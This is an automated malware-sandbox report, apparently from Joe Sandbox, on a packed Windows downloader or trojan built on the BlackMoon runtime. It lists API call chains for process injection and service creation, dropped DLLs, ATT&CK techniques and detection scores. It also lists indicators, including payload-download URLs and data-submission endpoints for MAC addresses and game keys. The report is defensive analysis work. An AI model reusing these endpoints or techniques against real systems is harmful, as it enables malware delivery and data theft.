                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00415BEB CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptGetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext

                    System Summary

                    barindex
                    Source: 0.3.1734098836319.exe.3273080.25.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.2.1734098836319.exe.32f0000.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.2.1734098836319.exe.676c1f.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.3.1734098836319.exe.3241c70.24.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.2.1734098836319.exe.66a062.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.3.1734098836319.exe.323ec70.23.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.3.1734098836319.exe.3273080.25.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.2.1734098836319.exe.66070f.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.3.1734098836319.exe.3241c70.24.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.2.1734098836319.exe.4f0c05.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: 0.2.1734098836319.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, type: DROPPED | Matched rule: Detects executables using BlackMoon RunTime, Author: ditekSHen
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00450181 NtQueryInformationProcess,CloseHandle,RtlMoveMemory
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00440195 NtQueryVirtualMemory,NtQueryVirtualMemory,ReadProcessMemory,ReadProcessMemory,CloseHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00409662 GetModuleHandleA,VirtualAlloc,LoadLibraryA,LoadLibraryA,RtlEnterCriticalSection,GetProcessHeap,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlCreateUnicodeStringFromAsciiz,LdrLoadDll,RtlFreeAnsiString,RtlLeaveCriticalSection,VirtualFree
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00440195 NtQueryVirtualMemory,NtQueryVirtualMemory,ReadProcessMemory,ReadProcessMemory,CloseHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0049E07A: DeviceIoControl
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00456EF9 OpenProcess,RtlMoveMemory,GetLastError,CreateProcessAsUserA,CloseHandle,CloseHandle,CloseHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | File created: C:\Windows\SysWOW64\Dult.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0043A058
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_005820B8
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00652449
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00500468
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0058262A
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004D4700
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00584984
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004DA9AC
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00582B9C
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00500C68
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0057D271
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0041B45B
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0064F667
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0057F626
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0045D82B
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0057BC65
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: String function: 00435B70 appears 97 times
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: String function: 0040288D appears 41 times
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: String function: 0043B92A appears 51 times
                    Source: 1734098836319.exe, 00000000.00000002.2953896278.00000000035CD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 1734098836319.exe
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamewindows.dll" vs 1734098836319.exe
                    Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamewindows 7.dll" vs 1734098836319.exe
                    Source: 1734098836319.exe, 00000000.00000003.1746048706.0000000003421000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 1734098836319.exe
                    Source: 1734098836319.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.3.1734098836319.exe.3273080.25.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.32f0000.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.676c1f.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.3241c70.24.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.66a062.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.323ec70.23.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.3273080.25.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.66070f.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.1734098836319.exe.3241c70.24.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.4f0c05.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.1734098836319.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, type: DROPPED | Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 1734098836319.exe | Static PE information: Section: UPX1 ZLIB complexity 0.9975773914319249
                    Source: classification engine | Classification label: mal100.rans.troj.evad.winEXE@1/3@1/2
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00439A44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004B0FEA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004CC4E0 GetCurrentDirectoryA,GetDiskFreeSpaceExA
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00426AD7 OpenSCManagerA,OpenServiceA,ControlService,ControlService,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0049F824 OpenSCManagerA,OpenServiceA,ControlService,ControlService,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0040BB11 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,CloseHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00403A0C CoInitialize,CoInitializeSecurity,CoCreateInstance,SysFreeString,CoSetProxyBlanket,CoUninitialize
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00426519 OpenSCManagerA,OpenServiceA,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\submit[1].json
                    Source: C:\Users\user\Desktop\1734098836319.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: 1734098836319.exe | Virustotal: Detection: 70%
                    Source: 1734098836319.exe | ReversingLabs: Detection: 76%
                    Source: 1734098836319.exe | String found in binary or memory: --command "shell cat /sys/class/net/eth0/address"
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                    Source: Binary string: C:\Users\BLACK\Desktop\E_Loader 1.0\Release\E_Loader.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2954098082.0000000010000000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: \InfinityHookPro-main\infinity_hook_pro\x64\Debug\infinity_hook_pro.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \win10 32-64\kmclass32_64_release\kmclass32_64_release\kmclass\x64\Debug\kmclass.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: ).pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Debug\Dultx64_win10_FH.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Win7Debug\MKDriver.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: .pdbk source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2954098082.0000000010014000.00000040.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004DA1DF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0057E0FD push ecx; ret 0_2_0057E110
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004DA1B0 push eax; ret 0_2_004DA1DE
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0064C34F push eax; ret 0_2_0064C37D
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004E4820 push eax; ret 0_2_004E484E
                    Source: initial sample | Static PE information: section name: UPX0
                    Source: initial sample | Static PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\1734098836319.exe | File created: C:\Windows\SysWOW64\Dult.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | File created: C:\Windows\SysWOW64\Dult.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00426519 OpenSCManagerA,OpenServiceA,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 8000
                    Source: unknown | Network traffic detected: HTTP traffic on port 8000 -> 49730
                    Source: C:\Users\user\Desktop\1734098836319.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\1734098836319.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\1734098836319.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\1734098836319.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select MACAddress From Win32_NetworkAdapter WHERE PNPDeviceID LIKE "%PCI%" AND NetConnectionStatus =2
                    Source: C:\Users\user\Desktop\1734098836319.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Dult.dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll
                    Source: C:\Users\user\Desktop\1734098836319.exe | API coverage: 8.5 %
                    Source: C:\Users\user\Desktop\1734098836319.exe | File Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004CF160 FindClose,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh#
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW)
                    Source: C:\Users\user\Desktop\1734098836319.exe | API call chain: ExitProcess graph end node | graph_0-114855
                    Source: C:\Users\user\Desktop\1734098836319.exe | API call chain: ExitProcess graph end node | graph_0-114868
                    Source: C:\Users\user\Desktop\1734098836319.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00409662 GetModuleHandleA,VirtualAlloc,LoadLibraryA,LoadLibraryA,RtlEnterCriticalSection,GetProcessHeap,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlCreateUnicodeStringFromAsciiz,LdrLoadDll,RtlFreeAnsiString,RtlLeaveCriticalSection,VirtualFree
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004DA1DF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004500CC mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004760F7 mov ecx, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004743D1 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00458BE5 mov ecx, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0047EDCD mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0043EDA9 mov ecx, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0043CDBB mov edx, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00454E4E mov ecx, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0043D15A mov ebx, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0047F1C9 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004CA140 GetProcessHeap,RtlAllocateHeap,MessageBoxA
                    Source: C:\Users\user\Desktop\1734098836319.exe | Process token adjusted: Debug

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004654D1 VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualFreeEx,WriteProcessMemory,CreateRemoteThread,VirtualFreeEx,VirtualFreeEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,VirtualFreeEx,CloseHandle
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0057A849 cpuid
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004DC182 GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
Credentials | Domains | Default Accounts | 1 Native API | 1 Valid Accounts | 1 Valid Accounts | 31 Obfuscated Files or Information | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 2 Windows Service | 11 Access Token Manipulation | 11 Software Packing | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 2 Windows Service | 1 DLL Side-Loading | NTDS | 211 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Process Injection | 21 Masquerading | LSA Secrets | 1 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Valid Accounts | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Access Token Manipulation | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

Source | Detection | Scanner | Label | Link
1734098836319.exe | 70% | Virustotal | | Browse
1734098836319.exe | 76% | ReversingLabs | Win32.Downloader.Sinresby |
1734098836319.exe | 100% | Avira | HEUR/AGEN.1356166 |
1734098836319.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll | 48% | ReversingLabs | Win32.Trojan.Generic |
C:\Windows\SysWOW64\Dult.dll | 0% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
https://Mozilla/4.0 | 0% | Avira URL Cloud | safe |
http://www.eyuyan.com)DVarFileInfo$ | 0% | Avira URL Cloud | safe |
http://.https | 0% | Avira URL Cloud | safe |
http://ocsp.certum.pl0. | 0% | Avira URL Cloud | safe |
http://43.226.78.44:8000/macweb/submit/ | 0% | Avira URL Cloud | safe |
http://cacerts.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crt0 | 0% | Avira URL Cloud | safe |
https://pki.jemmylovejenny.tk/rpa0 | 0% | Avira URL Cloud | safe |
https://wwug.lanzouq.com/huohansss | 0% | Avira URL Cloud | safe |
http://www.eyuyan.com | 0% | Avira URL Cloud | safe |
http://61.160.207.3:8003/api | 0% | Avira URL Cloud | safe |
http://43.226.78.44:8000/macweb/submit/&mac_address=channel_number=url | 0% | Avira URL Cloud | safe |
http://crls.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crl0 | 0% | Avira URL Cloud | safe |
https://www.uc.cn/ipIP:https://api.ip.sb/iphttp://pv.sohu.com/cityjson | 0% | Avira URL Cloud | safe |
https://pki.jemmylovejenny.tk/cps0/ | 0% | Avira URL Cloud | safe |
https://wwug.lanzouq.com/huohanssss.dll | 0% | Avira URL Cloud | safe |
http://subca.ocsp-certum.com0. | 0% | Avira URL Cloud | safe |
http://i.2.wen888.shop:4002/index/user.html | 0% | Avira URL Cloud | safe |
http://crls.pki.jemmylovejenny.tk/EVRootCA.crl0 | 0% | Avira URL Cloud | safe |
https://wwug.lanzouq.com/huohanqqqQ.dll | 0% | Avira URL Cloud | safe |
http://i.2.wen888.shop:4002/index/user.html&code=data&Game_Cient_Key_=&Game_St_=&Game_St_Key_=&gold= | 0% | Avira URL Cloud | safe |
https://www.lanzout.comRefererMozilla/5.0 | 0% | Avira URL Cloud | safe |
https://www.ip138.comUser-Agent: | 0% | Avira URL Cloud | safe |
https://cesg1.oss-cn-beijing.aliyuncs.com/;W | 0% | Avira URL Cloud | safe |
http://ocsp.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA0O | 0% | Avira URL Cloud | safe |
http://cacerts.pki.jemmylovejenny.tk/EVRootCA.crt0? | 0% | Avira URL Cloud | safe |
https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllo | 0% | Avira URL Cloud | safe |
https://cesg1.oss-cn-beijing.aliyuncs.com/ | 0% | Avira URL Cloud | safe |
https://www.certum.pl/repository.0 | 0% | Avira URL Cloud | safe |
http://bbs.dult.cn/thread-24328-1-1.html | 0% | Avira URL Cloud | safe |
https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll | 0% | Avira URL Cloud | safe |
http://www.eyuyan.comservice | 0% | Avira URL Cloud | safe |
https://User-Agent:Mozilla/4.0 | 0% | Avira URL Cloud | safe |
http://ocsp.pki.jemmylovejenny.tk/EVRootCA0= | 0% | Avira URL Cloud | safe |
https://wwug.lanzouq.com/huohanqqq | 0% | Avira URL Cloud | safe |
https://www.uc.cn/ip | 0% | Avira URL Cloud | safe |
https://www.lanzout.com | 0% | Avira URL Cloud | safe |
http://www.dult.cn/100.txt | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | 39.103.20.61 | true | false | | unknown
cesg1.oss-cn-beijing.aliyuncs.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://43.226.78.44:8000/macweb/submit/ | false | Avira URL Cloud: safe | unknown
https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.eyuyan.com)DVarFileInfo$ | 1734098836319.exe, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
